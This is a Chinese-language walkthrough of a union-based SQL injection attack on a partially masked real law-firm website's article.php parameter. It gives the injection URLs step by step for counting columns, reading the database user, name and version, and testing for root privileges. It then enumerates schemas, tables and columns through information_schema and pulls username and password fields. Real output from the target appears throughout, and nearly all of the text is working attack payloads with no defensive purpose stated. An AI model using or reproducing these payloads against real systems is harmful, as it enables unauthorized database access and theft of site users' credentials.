注:为了网站的安全,对网址做了处理
 
 
 
http://www.lawyerxxxx.com.cn/article.php?nid=2377 order by 15  出错,那么就是14
 
http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
------------------------------------------------
页面出现的数字是8和12
------------------------------------------------
用以下的函数来得到我们想要的
user()        得到连接数据库的用户名           lawyerxxxx@manaxxx.xxxx.com
database() 得到数据库名                        lawyerxxxxxx
version()  得到版本                            5.1.53-log
 
用函数来替换12,得到相关的信息
-----------------------------------------------
判断权限
ord(mid(user(),1,1))=114/*   返回错误就不是root权限
--------------------------------------
列出数据库表 需要转编码
unhex(hex(group_concat(schema_name)))
                       (table_name)))
                       (column_name)))
例如:
http://www.lawyexxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(schema_name)))
,13,14 from information_schema.schemata        列出数据库    information_schema,lawyerxxxxxx
------------------------------------------
下面的需要转码的 转为hex编码 (用工具转)
-----------------------------------------------------------------------------------
追加列表
    from information_schema.schemata   列数据库
    from information_schema.tables where table_shema=      列用户
    from information_schema.columns where table_name=      列表
例如:
http://www.lawyexxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(table_name)))
,13,14 from information_schema.tables where table_shema=0x6C6177796572666xxxxxx(lawyerxxxx20xx)(数据库名)
 
  http://www.lawyerxxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,
unhex(hex(group_concat(column_name)))
,13,14 from information_schema.columns where table_name=(表名)
-------------------------------------------
上面的需要转码的转为hex编码
--------------------------------------------------------------------------------
 获取用户名:
 
http://www.lawyerxxxx.com.cn/article.php?nid=2377 and 1=2 UNION SELECT 1,2,3,4,5,6,7, 用户字段名,9,10,11,
密码字段名,13,14 from 表名